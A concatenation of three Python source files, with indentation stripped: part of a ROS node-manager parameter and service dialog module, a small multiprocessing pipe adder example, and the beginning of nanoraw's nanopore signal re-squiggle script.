result[param] = r
elif isinstance(value, list):
new_val = []
for val in value:
r = self._remove_change_state(val, only_changed)
if r:
new_val.append(r)
if new_val:
result[param] = new_val
elif isinstance(value, tuple):
if value[1] or not only_changed:
result[param] = value[0]
else:
print "unknown parameter: should not happens", param, value
return result
def _save_parameter(self):
try:
import yaml
(fileName, _) = QFileDialog.getSaveFileName(self,
"Save parameter",
self.__current_path,
"YAML files (*.yaml);;All files (*)")
if fileName:
self.__current_path = os.path.dirname(fileName)
nm.settings().current_dialog_path = os.path.dirname(fileName)
content = self._remove_change_state(self.content.value(), False)
text = yaml.dump(content, default_flow_style=False)
with open(fileName, 'w+') as f:
f.write(text)
except Exception as e:
import traceback
print traceback.format_exc(1)
WarningMessageBox(QMessageBox.Warning, "Save parameter Error",
                              'Error while saving parameters', str(e)).exec_()
def _load_parameter(self):
try:
import yaml
(fileName, _) = QFileDialog.getOpenFileName(self, "Load parameter",
self.__current_path,
"YAML files (*.yaml);;All files (*)")
if fileName:
self.__current_path = os.path.dirname(fileName)
nm.settings().current_dialog_path = os.path.dirname(fileName)
with open(fileName, 'r') as f:
# print yaml.load(f.read())
self.content.set_values(yaml.load(f.read()))
except Exception as e:
import traceback
print traceback.format_exc(1)
WarningMessageBox(QMessageBox.Warning, "Load parameter Error",
                              'Error while loading parameters',
str(e)).exec_()
# %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
# %%%%%%%%%%%%%%%%%% close handling %%%%%%%%%%%%%%%%%%%%%
# %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
def accept(self):
self.setResult(QDialog.Accepted)
self.accepted.emit()
if self.isModal():
self.hide()
def reject(self):
self.setResult(QDialog.Rejected)
self.rejected.emit()
self.hide()
def hideEvent(self, event):
self.close()
def closeEvent(self, event):
'''
        Marks the dialog to be deleted on close.
'''
self.setAttribute(Qt.WA_DeleteOnClose, True)
QDialog.closeEvent(self, event)
class MasterParameterDialog(ParameterDialog):
'''
    This dialog is an extension of the L{ParameterDialog}. The parameters and their
    values are requested from the ROS master parameter server. The requests are
    threaded, as are the changes of the ROS parameters assigned to the given
    namespace.
'''
def __init__(self, masteruri, ns='/', parent=None):
'''
        @param masteruri: if the master uri is not None, the parameters are retrieved from the ROS parameter server.
@type masteruri: C{str}
@param ns: namespace of the parameter retrieved from the ROS parameter server.
@type ns: C{str}
'''
ParameterDialog.__init__(self, dict(), parent=parent)
self.masteruri = masteruri
self.ns = ns
self.is_delivered = False
self.is_send = False
self.mIcon = QIcon(":/icons/default_cfg.png")
self.setWindowIcon(self.mIcon)
self.resize(450, 300)
self.add_new_button = QPushButton()
self.add_new_button.setIcon(QIcon(':/icons/crystal_clear_add.png'))
self.add_new_button.clicked.connect(self._on_add_parameter)
self.add_new_button.setToolTip('Adds a new parameter to the list')
self.add_new_button.setFlat(True)
self.buttonBox.addButton(self.add_new_button, QDialogButtonBox.ActionRole)
self.showLoadSaveButtons()
# self.apply_button = QPushButton(self.tr("&Ok"))
# self.apply_button.clicked.connect(self._on_apply)
# self.buttonBox.addButton(self.apply_button, QDialogButtonBox.ApplyRole)
# self.buttonBox.accepted.connect(self._on_apply)
self.setText(' '.join(['Obtaining parameters from the parameter server', masteruri, '...']))
self.parameterHandler = ParameterHandler()
self.parameterHandler.parameter_list_signal.connect(self._on_param_list)
self.parameterHandler.parameter_values_signal.connect(self._on_param_values)
self.parameterHandler.delivery_result_signal.connect(self._on_delivered_values)
self.parameterHandler.requestParameterList(masteruri, ns)
# self.apply_button.setFocus(Qt.OtherFocusReason)
def accept(self):
if self.masteruri is not None and not self.is_send:
try:
params = self.getKeywords(True)
params = self.keywords2params(params)
ros_params = dict()
for p, v in params.items():
rospy.logdebug("updated parameter: %s, %s, %s", p, unicode(v), type(v))
ros_params[roslib.names.ns_join(self.ns, p)] = v
if ros_params:
self.is_send = True
                    self.setText('Sending parameters to the server...')
self.parameterHandler.deliverParameter(self.masteruri, ros_params)
else:
self.close()
except Exception, e:
import traceback
print traceback.format_exc(1)
QMessageBox.warning(self, self.tr("Warning"), str(e), QMessageBox.Ok)
elif self.masteruri is None:
QMessageBox.warning(self, self.tr("Error"), 'Invalid ROS master URI', QMessageBox.Ok)
# %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
# %%%%%%%%%%%%%%%%%% ROS parameter handling %%%%%%%%%%%%%%%%%%%%%
# %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
def _on_add_parameter(self):
params_arg = {'namespace': ('string', self.ns), 'name': ('string', ''), 'type': ('string', ['string', 'int', 'float', 'bool', 'list']), 'value': ('string', '')}
dia = ParameterDialog(params_arg)
dia.setWindowTitle('Add new parameter')
dia.resize(360, 150)
dia.setFilterVisible(False)
if dia.exec_():
try:
params = dia.getKeywords()
if params['name']:
if params['type'] == 'int':
value = int(params['value'])
elif params['type'] == 'float':
value = float(params['value'])
elif params['type'] == 'bool':
value = str2bool(params['value'])
elif params['type'] == 'list':
try:
import yaml
value = yaml.load("[%s]" % params['value'])
                            # if the YAML is empty, load() will return None.
                            # We want an empty list instead for our
                            # representation of empty.
if value is None:
value = []
except yaml.MarkedYAMLError, e:
QMessageBox.warning(self, self.tr("Warning"), "yaml error: %s" % str(e), QMessageBox.Ok)
else:
value = params['value']
self._on_param_values(self.masteruri, 1, '', {roslib.names.ns_join(params['namespace'], params['name']): (1, '', value)})
else:
QMessageBox.warning(self, self.tr("Warning"), 'Empty name is not valid!', QMessageBox.Ok)
except ValueError, e:
import traceback
print traceback.format_exc(1)
QMessageBox.warning(self, self.tr("Warning"), unicode(e), QMessageBox.Ok)
def _on_param_list(self, masteruri, code, msg, params):
'''
@param masteruri: The URI of the ROS parameter server
@type masteruri: C{str}
@param code: The return code of the request. If not 1, the message is set and the list can be ignored.
@type code: C{int}
@param msg: The message of the result.
@type msg: C{str}
        @param params: The list of parameter names.
@type params: C{[str]}
'''
if code == 1:
params.sort()
self.parameterHandler.requestParameterValues(masteruri, params)
else:
self.setText(msg)
def _on_param_values(self, masteruri, code, msg, params):
'''
@param masteruri: The URI of the ROS parameter server
@type masteruri: C{str}
@param code: The return code of the request. If not 1, the message is set and the list can be ignored.
@type code: C{int}
@param msg: The message of the result.
@type msg: C{str}
        @param params: The dictionary of parameter names and request results.
@type params: C{dict(paramName : (code, statusMessage, parameterValue))}
'''
if code == 1:
dia_params = dict()
for p, (code_n, _, val) in params.items(): # _:=msg_n
if code_n != 1:
val = ''
type_str = 'string'
value = unicode(val)
if isinstance(val, bool):
type_str = 'bool'
elif isinstance(val, int):
type_str = 'int'
elif isinstance(val, float):
type_str = 'float'
elif isinstance(val, list) or isinstance(val, dict):
# handle representation of `rosparam`
type_str = '[]'
value = ''
for v in val:
if len(value) > 0:
value = value + ', '
value = value + unicode(v)
elif isinstance(val, Binary):
type_str = 'binary'
param = p.replace(self.ns, '')
names_sep = param.split(roslib.names.SEP)
param_name = names_sep.pop()
if names_sep:
group = dia_params
for n in names_sep:
group_name = n
if group_name in group:
group = group[group_name][1]
else:
tmp_dict = dict()
group[group_name] = ('list', tmp_dict)
group = tmp_dict
group[param_name] = (type_str, [value])
else:
dia_params[param_name] = (type_str, [value])
try:
self.content.createFieldFromValue(dia_params)
self.setInfoActive(False)
except Exception, e:
import traceback
print traceback.format_exc(1)
QMessageBox.warning(self, self.tr("Warning"), unicode(e), QMessageBox.Ok)
else:
self.setText(msg)
def _on_delivered_values(self, masteruri, code, msg, params):
'''
@param masteruri: The URI of the ROS parameter server
@type masteruri: C{str}
@param code: The return code of the request. If not 1, the message is set and the list can be ignored.
@type code: C{int}
@param msg: The message of the result.
@type msg: C{str}
        @param params: The dictionary of parameter names and request results.
@type params: C{dict(paramName : (code, statusMessage, parameterValue))}
'''
self.is_delivered = True
errmsg = ''
if code == 1:
for _, (code_n, msg, _) in params.items(): # _:=param, val
if code_n != 1:
errmsg = '\n'.join([errmsg, msg])
else:
errmsg = msg if msg else 'Unknown error on set parameter'
if errmsg:
import traceback
print traceback.format_exc(1)
QMessageBox.warning(self, self.tr("Warning"), errmsg, QMessageBox.Ok)
self.is_delivered = False
self.is_send = False
self.setInfoActive(False)
if self.is_delivered:
self.close()
class ServiceDialog(ParameterDialog):
'''
    Adds support for calling a service to the L{ParameterDialog}. The needed
    input fields are created from the service request message type. The service
    call is executed in a thread to avoid blocking the GUI.
'''
service_resp_signal = Signal(str, str)
def __init__(self, service, parent=None):
'''
@param service: Service to call.
@type service: U{master_discovery_fkie.ServiceInfo<http://docs.ros.org/kinetic/api/master_discovery_fkie/html/modules.html#master_discovery_fkie.master_info.ServiceInfo>}
'''
self.service = service
slots = service.get_service_class(True)._request_class.__slots__
types = service.get_service_class()._request_class._slot_types
ParameterDialog.__init__(self, self._params_from_slots(slots, types), buttons=QDialogButtonBox.Close, parent=parent)
self.setWindowTitle(''.join(['Call ', service.name]))
self.service_resp_signal.connect(self._handle_resp)
self.resize(450, 300)
if not slots:
self.setText(''.join(['Wait for response ...']))
thread = threading.Thread(target=self._callService)
thread.setDaemon(True)
thread.start()
else:
self.call_service_button = QPushButton(self.tr("&Call"))
self.call_service_button.clicked.connect(self._on_call_service)
self.buttonBox.addButton(self.call_service_button, QDialogButtonBox.ActionRole)
self.hide_button = QPushButton(self.tr("&Hide/Show output"))
self.hide_button.clicked.connect(self._on_hide_output)
self.buttonBox.addButton(self.hide_button, QDialogButtonBox.ActionRole)
self.hide_button.setVisible(False)
self.showLoadSaveButtons()
def _on_hide_output(self):
self.setInfoActive(not self.info_field.isVisible())
def _on_call_service(self):
try:
self.hide_button.setVisible(True)
params = self.getKeywords()
self.setText(''.join(['Wait for response ...']))
thread = threading.Thread(target=self._callService, args=((params,)))
thread.setDaemon(True)
thread.start()
except Exception, e:
rospy.logwarn("Error while reading parameter for %s service: %s", str(self.service.name), unicode(e))
self.setText(''.join(['Error while reading parameter:\n', unicode(e)]))
def _callService(self, params={}):
req = unicode(params) if params else ''
try:
req, resp = nm.starter().callService(self.service.uri, self.service.name, self.service.get_service_class(), [params])
self.service_resp_signal.emit(str(req), str(resp))
except Exception, e:
import traceback
print traceback.format_exc(1)
rospy.logwarn("Error while call service '%s': %s", str(self.service.name), str(e))
self.service_resp_signal.emit(unicode(req), unicode(e))
@classmethod
def _params_from_slots(cls, slots, types, values={}):
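        # recursively builds the {slot: (type, default)} structure expected by
        # ParameterDialog: primitive and time/duration slots get a flat default,
        # nested message types recurse into their own slots (array slots become
        # a list of such dictionaries)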
result = dict()
for slot, msg_type in zip(slots, types):
base_type, is_array, _ = roslib.msgs.parse_type(msg_type) # _:=array_length
if base_type in roslib.msgs.PRIMITIVE_TYPES or base_type in ['time', 'duration']:
default_value = 'now' if base_type in ['time', 'duration'] else ''
if slot in values and values[slot]:
default_value = values[slot]
result[slot] = (msg_type, default_value)
else:
try:
list_msg_class = roslib.message.get_message_class(base_type)
if is_array and slot in values:
subresult = []
for slot_value in values[slot]:
subvalue = cls._params_from_slots(list_msg_class.__slots__, list_msg_class._slot_types, slot_value if slot in values and slot_value else {})
subresult.append(subvalue)
result[slot] = (msg_type, subresult)
else:
subresult = cls._params_from_slots(list_msg_class.__slots__, list_msg_class._slot_types, values[slot] if slot in values and values[slot] else {})
result[slot] = (msg_type, [subresult] if is_array else subresult)
except ValueError, e:
import traceback
print traceback.format_exc(1)
rospy.logwarn("Error while parse message type '%s': %s", str(msg_type), str(e))
return result
def _handle_resp(self, req, resp):
self.setWindowTitle(''.join(['Request / Response of ', self.service.name]))
self.setText('\n'.join([unicode(req), '---', unicode(resp)]))
|
pipe_adder_20_3_2.py
|
#!/usr/bin/env python3
# -*- coding: UTF-8 -*-
# Bidirectional communication over a pipe
import multiprocessing
# server side
def adder(pipe):
server_p, client_p = pipe
client_p.close()
while True:
try:
x, y = server_p.recv()
except EOFError:
break
result = x + y
        server_p.send(result)  # the server end can also send data back
print('Server done')
if __name__ == '__main__':
    # create the pipe
server_p,client_p = multiprocessing.Pipe()
    # start the server process
serv_p = multiprocessing.Process(target=adder, args=((server_p, client_p),))
serv_p.start()
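    # close the parent's copy of the server end; only the child keeps it open,
    # so the child's recv() raises EOFError once every handle to the client end
    # is closed (the child already closed its own copy above)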
server_p.close()
client_p.send([3,4])
    print(client_p.recv())  # the client end can also receive
client_p.send(['hello', 'world'])
print(client_p.recv())
    # close the client end
client_p.close()
    # wait for the server process to finish
serv_p.join()
|
resquiggle.py
|
import os, sys
import re
import h5py
import Queue
import numpy as np
np.seterr(all='raise')
import multiprocessing as mp
from glob import glob
from time import sleep, time
from subprocess import call, STDOUT
from tempfile import NamedTemporaryFile
from distutils.version import LooseVersion
from itertools import groupby, izip, repeat
from collections import defaultdict, namedtuple
# import nanoraw functions
import option_parsers
import nanoraw_helper as nh
VERBOSE = False
# allow this many times the alignment batch size into the queue of
# reads to be resquiggled
ALIGN_BATCH_MULTIPLIER = 5
indelStats = namedtuple('indelStats',
('start', 'end', 'diff'))
indelGroupStats = namedtuple('indelGroupStats',
('start', 'end', 'cpts', 'indels'))
readInfo = namedtuple(
'readInfo',
('ID', 'Subgroup', 'ClipStart', 'ClipEnd',
'Insertions', 'Deletions', 'Matches', 'Mismatches'))
genomeLoc = namedtuple(
'genomeLoc', ('Start', 'Strand', 'Chrom'))
M5_FIELDS = (
'qName', 'qLength', 'qStart', 'qEnd', 'qStrand',
'tName', 'tLength', 'tStart', 'tEnd', 'tStrand',
'score', 'numMatch', 'numMismatch', 'numIns', 'numDel',
'mapQV', 'qAlignedSeq', 'matchPattern', 'tAlignedSeq')
SAM_FIELDS = (
'qName', 'flag', 'rName', 'pos', 'mapq',
'cigar', 'rNext', 'pNext', 'tLen', 'seq', 'qual')
CIGAR_PAT = re.compile('(\d+)([MIDNSHP=X])')
GAP_PAT = re.compile('-+')
#################################################
########## Raw Signal Re-squiggle Code ##########
#################################################
def write_new_fast5_group(
filename, genome_location, read_info,
read_start_rel_to_raw, new_segs, align_seq, alignVals,
old_segs, norm_signal, scale_values, corrected_group,
basecall_subgroup, norm_type, outlier_thresh, compute_sd):
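    # writes the re-squiggled read under /Analyses/<corrected_group>/<basecall_subgroup>/
    # with an 'Alignment' group (mapping attributes, read/genome alignment, old read
    # segments) and an 'Events' dataset (norm_mean, norm_stdev, start, length and base
    # for each aligned genomic base)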
try:
# compute event data before accessing fast5 file
norm_mean_sd = [
(base_sig.mean(), base_sig.std() if compute_sd else np.nan)
for base_sig in np.split(norm_signal, new_segs[1:-1])]
event_data = np.array(
zip(zip(*norm_mean_sd)[0], zip(*norm_mean_sd)[1],
new_segs[:-1], np.diff(new_segs), list(align_seq)),
dtype=[('norm_mean', '<f8'), ('norm_stdev', '<f8'),
('start', '<u4'), ('length', '<u4'), ('base', 'S1')])
np_read_align = np.chararray(len(alignVals))
np_read_align[:] = zip(*alignVals)[0]
np_genome_align = np.chararray(len(alignVals))
np_genome_align[:] = zip(*alignVals)[1]
except:
raise NotImplementedError, 'Error computing new events.'
try:
read_data = h5py.File(filename, 'r+')
except:
raise NotImplementedError, (
'Error opening file for new group writing. This should ' +
'have been caught during the alignment phase. Check that ' +
'there are no other nanoraw processes or processes ' +
'accessing these HDF5 files running simultaneously.')
try:
corr_grp = read_data['/Analyses/' + corrected_group]
# add subgroup matching subgroup from original basecalls
corr_subgrp = corr_grp.create_group(basecall_subgroup)
corr_subgrp.attrs['shift'] = scale_values.shift
corr_subgrp.attrs['scale'] = scale_values.scale
corr_subgrp.attrs['lower_lim'] = scale_values.lower_lim
corr_subgrp.attrs['upper_lim'] = scale_values.upper_lim
corr_subgrp.attrs['norm_type'] = norm_type
corr_subgrp.attrs['outlier_threshold'] = outlier_thresh
# store alignment statistics
corr_alignment = corr_subgrp.create_group('Alignment')
corr_alignment.attrs['mapped_start'] = genome_location.Start
corr_alignment.attrs['mapped_strand'] = genome_location.Strand
corr_alignment.attrs['mapped_chrom'] = genome_location.Chrom
corr_alignment.attrs['clipped_bases_start'] = read_info.ClipStart
corr_alignment.attrs['clipped_bases_end'] = read_info.ClipEnd
corr_alignment.attrs['num_insertions'] = read_info.Insertions
corr_alignment.attrs['num_deletions'] = read_info.Deletions
corr_alignment.attrs['num_matches'] = read_info.Matches
corr_alignment.attrs['num_mismatches'] = read_info.Mismatches
corr_alignment.create_dataset(
'read_alignment', data=np_read_align, compression="gzip")
corr_alignment.create_dataset(
'genome_alignment', data=np_genome_align, compression="gzip")
# store old segmentation in order to plot "correction process"
corr_alignment.create_dataset(
'read_segments', data=old_segs, compression="gzip")
# Add Events to data frame with event means, SDs and lengths
corr_events = corr_subgrp.create_dataset(
'Events', data=event_data, compression="gzip")
corr_events.attrs[
'read_start_rel_to_raw'] = read_start_rel_to_raw
except:
raise NotImplementedError, (
'Error writing resquiggle information back into fast5 file.')
try:
read_data.flush()
read_data.close()
except:
raise NotImplementedError, (
'Error closing fast5 file after writing resquiggle ' +
'information.')
return
def get_indel_groups(
alignVals, align_segs, raw_signal, min_seg_len, timeout,
num_cpts_limit):
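    # returns a list of indelGroupStats(start, end, cpts, indels), one entry per run
    # of nearby indels; cpts are the new changepoints in raw-signal coordinates used
    # to re-segment the region between align_segs[start] and align_segs[end]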
def get_all_indels():
# get genomic sequence for and between each indel
read_align = ''.join(zip(*alignVals)[0])
genome_align = ''.join(zip(*alignVals)[1])
genome_gaps = [(m.start(), m.end()) for m in
GAP_PAT.finditer(genome_align)]
read_gaps = [(m.start(), m.end())
for m in GAP_PAT.finditer(read_align)]
all_indel_locs = sorted(
genome_gaps + read_gaps +
[(0,0), (len(read_align), len(read_align))])
btwn_indel_seqs = [
genome_align[m_start:m_end] for m_start, m_end in
zip(zip(*all_indel_locs)[1][:-1],
zip(*all_indel_locs)[0][1:])]
# is each indel an ins(ertion) or deletion
all_is_ins = [read_align[start:end].startswith('-')
for start, end in all_indel_locs[1:-1]]
indel_seqs = [
genome_align[start:end]
if is_ins else read_align[start:end]
for is_ins, (start, end) in
zip(all_is_ins, all_indel_locs[1:-1])]
# loop over indels along with sequence before and after in
# order to check for ambiguous indels
unambig_indels = []
curr_read_len = len(btwn_indel_seqs[0])
for indel_seq, before_seq, after_seq, is_ins in zip(
indel_seqs, btwn_indel_seqs[:-1], btwn_indel_seqs[1:],
all_is_ins):
indel_len = len(indel_seq)
# if this is an insertion then don't include indel in
# length to end of indel
# also extend indel end by 1 in order to check for new
            # breakpoints for neighboring segments
indel_end = curr_read_len + 1 if is_ins else \
curr_read_len + indel_len + 1
indel_diff = indel_len if is_ins else -1 * indel_len
# indel without ambiguity correction
# indelStats(curr_read_len - 1, indel_end, indel_diff)
# extend ambiguous indels
# only extend up to one position before beginning or end
# as a one base pad is added outside of indel
u, d = -1, 0
while(d < len(after_seq) - 1 and
indel_seq[d%indel_len] == after_seq[d]):
d += 1
while(u * -1 <= len(before_seq) - 1 and
indel_seq[(u%indel_len)-indel_len] == before_seq[u]):
u -= 1
unambig_indels.append(indelStats(
curr_read_len + u, indel_end + d, indel_diff))
if not is_ins:
curr_read_len += indel_len
curr_read_len += len(after_seq)
return unambig_indels
def extend_group(indel_group):
group_start = min(indel.start for indel in indel_group)
group_stop = max(indel.end for indel in indel_group)
num_cpts = sum(indel.diff for indel in indel_group
) + group_stop - group_start - 1
# check that there are enough points to split
# add an extra set of values to ensure no zero changepoint
while align_segs[group_stop] - align_segs[group_start] < (
num_cpts + 2) * min_seg_len:
num_cpts += int(group_start > 0) + int(
group_stop < len(align_segs) - 1)
group_start = max(0, group_start - 1)
group_stop = min(len(align_segs) - 1, group_stop + 1)
return group_start, group_stop, num_cpts
def extend_and_join(indel_group):
group_start, group_stop, num_cpts = extend_group(indel_group)
# check if the extension hits the previous group
while (len(indel_groups) > 0) and (
group_start <= indel_groups[-1].end):
indel_group = indel_groups[-1].indels + indel_group
del indel_groups[-1]
group_start, group_stop, num_cpts = extend_group(
indel_group)
return group_start, group_stop, num_cpts, indel_group
def get_cpts(group_start, group_stop, num_cpts):
"""
Get changepoints where the raw difference between min_seg_len
obs to the left and min_seg_len obs to the right is largest
while maintaining the min_seg_len between changepoints.
Still need to test this function for off by one bugs etc.
"""
if num_cpts_limit is not None and num_cpts > num_cpts_limit:
raise RuntimeError, ('Reached maximum number of ' +
'changepoints for a single indel')
sig_cs = raw_signal[align_segs[group_start]:
align_segs[group_stop]]
sig_cs = np.cumsum(np.insert(sig_cs, 0, 0))
# get difference between all neighboring min_seg_len regions
running_diffs = np.abs((2 * sig_cs[min_seg_len:-min_seg_len]) -
sig_cs[:-2*min_seg_len] -
sig_cs[2*min_seg_len:])
cpts = []
blacklist_pos = set()
for pos in running_diffs.argsort()[::-1]:
if pos not in blacklist_pos:
cpts.append(pos)
blacklist_pos.update(range(
pos-min_seg_len+1, pos+min_seg_len+1))
if len(cpts) == num_cpts:
break
if len(cpts) < num_cpts:
return None
return sorted([cpt + min_seg_len for cpt in cpts])
def extend_for_cpts(
group_start, group_stop, num_cpts, indel_group):
cpts = get_cpts(group_start, group_stop, num_cpts)
# There is a bug in the changepoint package that allows a zero
# width first segment. If one is present extend the region and
# find cpts again
while cpts is None or cpts[0] == 0:
num_cpts += int(group_start > 0) + int(
group_stop < len(align_segs) - 1)
group_start = max(0, group_start - 1)
group_stop = min(len(align_segs) - 1, group_stop + 1)
while (len(indel_groups) > 0) and (
group_start <= indel_groups[-1].end):
indel_group = indel_groups[-1].indels + indel_group
del indel_groups[-1]
group_start, group_stop, num_cpts = extend_group(
indel_group)
cpts = get_cpts(group_start, group_stop, num_cpts)
return [x + align_segs[group_start]
for x in cpts], group_start, group_stop, indel_group
if timeout is not None:
timeout_start = time()
# sort indels in order of start positions
all_indels = get_all_indels()
if len(all_indels) == 0:
return []
indel_groups = []
curr_group = [all_indels[0],]
for indel in all_indels[1:]:
if timeout is not None and time() - timeout_start > timeout:
raise RuntimeError, 'Read took too long to re-segment.'
# check if indel hits current group
if max(g_indel.end for g_indel in curr_group) >= indel.start:
curr_group.append(indel)
else:
(curr_start, curr_stop, num_cpts,
curr_group) = extend_and_join(curr_group)
cpts, curr_start, curr_stop, curr_group = extend_for_cpts(
curr_start, curr_stop, num_cpts, curr_group)
# if the indel group still reaches the next indel
if curr_stop >= indel.start:
curr_group.append(indel)
else:
indel_groups.append(indelGroupStats(
curr_start, curr_stop, cpts, curr_group))
curr_group = [indel,]
# handle the last indel group if it is not yet included
if len(indel_groups) == 0 or \
indel_groups[-1].indels[-1] != all_indels[-1]:
curr_start, curr_stop, num_cpts, curr_group = extend_and_join(
curr_group)
cpts, curr_start, curr_stop, curr_group = extend_for_cpts(
curr_start, curr_stop, num_cpts, curr_group)
indel_groups.append(indelGroupStats(
curr_start, curr_stop, cpts, curr_group))
return indel_groups
def resquiggle_read(
fast5_fn, read_start_rel_to_raw, starts_rel_to_read,
norm_type, outlier_thresh, alignVals,
timeout, num_cpts_limit, genome_loc, read_info,
basecall_group, corrected_group, compute_sd, pore_model,
min_event_obs=4, in_place=True):
    # errors should not happen here since these slots were checked
    # in the alignment function, but old zombie processes might cause
    # problems here
try:
fast5_data = h5py.File(fast5_fn, 'r')
channel_info = nh.get_channel_info(fast5_data)
# extract raw data for this read
all_raw_signal = fast5_data[
'/Raw/Reads/'].values()[0]['Signal'].value
event_means, event_kmers = None, None
if norm_type == 'pA':
event_data = fast5_data[
'/Analyses/' + basecall_group + '/' +
read_info.Subgroup + '/Events'].value
event_means = event_data['mean']
event_kmers = event_data['model_state']
fast5_data.close()
except:
raise NotImplementedError, (
'Error opening file for re-squiggle. This should have ' +
'been caught during the alignment phase. Check that there ' +
'are no other nanoraw processes or processes accessing ' +
'these HDF5 files running simultaneously.')
# normalize signal
# print read id for resquiggle shift and scale output
#sys.stdout.write(read_info.ID + "\t")
norm_signal, scale_values = nh.normalize_raw_signal(
all_raw_signal, read_start_rel_to_raw, starts_rel_to_read[-1],
norm_type, channel_info, outlier_thresh, pore_model=pore_model,
event_means=event_means, event_kmers=event_kmers)
# group indels that are adjacent for re-segmentation
indel_groups = get_indel_groups(
alignVals, starts_rel_to_read, norm_signal, min_event_obs,
timeout, num_cpts_limit)
new_segs = []
prev_stop = 0
for group_start, group_stop, cpts, group_indels in indel_groups:
## add segments from last indel to this one and new segments
new_segs.append(
np.append(starts_rel_to_read[prev_stop:group_start+1],
cpts))
prev_stop = group_stop
# handle end of read
new_segs.append(starts_rel_to_read[prev_stop:])
new_segs = np.concatenate(new_segs)
if min(np.diff(new_segs)) < 1:
raise NotImplementedError, (
'New segments include zero length events.')
if new_segs[0] < 0:
raise NotImplementedError, (
'New segments start with negative index.')
if new_segs[-1] > norm_signal.shape[0]:
raise NotImplementedError, (
'New segments end past raw signal values.')
# get just from alignVals
align_seq = ''.join(zip(*alignVals)[1]).replace('-', '')
if new_segs.shape[0] != len(align_seq) + 1:
raise ValueError, ('Aligned sequence does not match number ' +
'of segments produced.')
if in_place:
# create new hdf5 file to hold new read signal
write_new_fast5_group(
fast5_fn, genome_loc, read_info,
read_start_rel_to_raw, new_segs, align_seq, alignVals,
starts_rel_to_read, norm_signal, scale_values,
corrected_group, read_info.Subgroup, norm_type,
outlier_thresh, compute_sd)
else:
# create new hdf5 file to hold corrected read events
pass
return
def resquiggle_worker(
basecalls_q, failed_reads_q, basecall_group, corrected_group,
norm_type, outlier_thresh, timeout, num_cpts_limit, compute_sd,
pore_model):
num_processed = 0
while True:
try:
fast5_fn, sgs_align_data = basecalls_q.get(block=False)
# None values placed in queue when all files have
# been processed
if fast5_fn is None: break
except Queue.Empty:
sleep(1)
continue
num_processed += 1
if VERBOSE and num_processed % 100 == 0:
sys.stderr.write('.')
sys.stderr.flush()
# process different read subgroups separately so that the same
# file is never open simultaneously
for align_data in sgs_align_data:
(alignVals, genome_loc, starts_rel_to_read,
read_start_rel_to_raw, read_info) = align_data
try:
resquiggle_read(
fast5_fn, read_start_rel_to_raw, starts_rel_to_read,
norm_type, outlier_thresh, alignVals,
timeout, num_cpts_limit, genome_loc, read_info,
basecall_group, corrected_group, compute_sd,
pore_model)
except Exception as e:
# uncomment to identify mysterious errors
#raise
failed_reads_q.put((
str(e), read_info.Subgroup + ' :: ' + fast5_fn))
return
############################################
########## Genomic Alignment Code ##########
############################################
def fix_raw_starts_for_clipped_bases(
start_clipped_bases, end_clipped_bases, starts_rel_to_read,
read_start_rel_to_raw):
if start_clipped_bases > 0:
start_clipped_obs = starts_rel_to_read[start_clipped_bases]
starts_rel_to_read = starts_rel_to_read[
start_clipped_bases:] - start_clipped_obs
read_start_rel_to_raw += start_clipped_obs
if end_clipped_bases > 0:
starts_rel_to_read = starts_rel_to_read[
:-1 * end_clipped_bases]
return starts_rel_to_read, read_start_rel_to_raw
def fix_all_clipped_bases(batch_align_data, batch_reads_data):
clip_fix_align_data = []
for read_fn_sg, (
alignVals, genome_loc, start_clipped_bases,
end_clipped_bases) in batch_align_data.iteritems():
(read_start_rel_to_raw, starts_rel_to_read, basecalls,
channel_info, read_id) = batch_reads_data[read_fn_sg]
# fix raw start positions to match bases clipped in mapping
starts_rel_to_read, read_start_rel_to_raw \
= fix_raw_starts_for_clipped_bases(
start_clipped_bases, end_clipped_bases,
starts_rel_to_read, read_start_rel_to_raw)
bc_subgroup, fast5_fn = read_fn_sg.split(':::')
num_ins, num_del, num_match, num_mismatch = 0, 0, 0, 0
for rb, gb in alignVals:
if rb == '-':
num_del += 1
elif gb == '-':
num_ins += 1
elif rb == gb:
num_match += 1
else:
num_mismatch += 1
read_info = readInfo(
read_id, bc_subgroup, start_clipped_bases, end_clipped_bases,
num_ins, num_del, num_match, num_mismatch)
clip_fix_align_data.append((fast5_fn, (
alignVals, genome_loc, starts_rel_to_read,
read_start_rel_to_raw, read_info)))
return clip_fix_align_data
def clip_m5_alignment(alignVals, start, strand, chrm):
# clip read to first matching bases
start_clipped_read_bases = 0
start_clipped_genome_bases = 0
start_clipped_align_bases = 0
r_base, g_base = alignVals[0]
while r_base == '-' or g_base == '-':
start_clipped_read_bases += int(r_base != '-')
start_clipped_genome_bases += int(g_base != '-')
start_clipped_align_bases += 1
r_base, g_base = alignVals[start_clipped_align_bases]
end_clipped_read_bases = 0
end_clipped_genome_bases = 0
end_clipped_align_bases = 0
r_base, g_base = alignVals[-1]
while r_base == '-' or g_base == '-':
end_clipped_read_bases += int(r_base != '-')
end_clipped_genome_bases += int(g_base != '-')
end_clipped_align_bases += 1
r_base, g_base = alignVals[-1 * (end_clipped_align_bases + 1)]
alignVals = alignVals[start_clipped_align_bases:]
if end_clipped_align_bases > 0:
alignVals = alignVals[:-1*end_clipped_align_bases]
if strand == '+' and start_clipped_genome_bases > 0:
genome_loc = genomeLoc(
start + start_clipped_genome_bases, '+', chrm)
elif strand == '-' and end_clipped_genome_bases > 0:
genome_loc = genomeLoc(
start + end_clipped_genome_bases, '-', chrm)
else:
genome_loc = genomeLoc(start, strand, chrm)
return alignVals, start_clipped_read_bases, \
end_clipped_read_bases, genome_loc
def parse_m5_record(r_m5_record):
if r_m5_record['tStrand'] != '+':
raise NotImplementedError, (
'Mapping indicates negative strand reference mapping.')
if r_m5_record['qStrand'] == "+":
alignVals = zip(r_m5_record['qAlignedSeq'],
r_m5_record['tAlignedSeq'])
else:
alignVals = zip(nh.rev_comp(r_m5_record['qAlignedSeq']),
nh.rev_comp(r_m5_record['tAlignedSeq']))
alignVals, start_clipped_bases, end_clipped_bases, genome_loc \
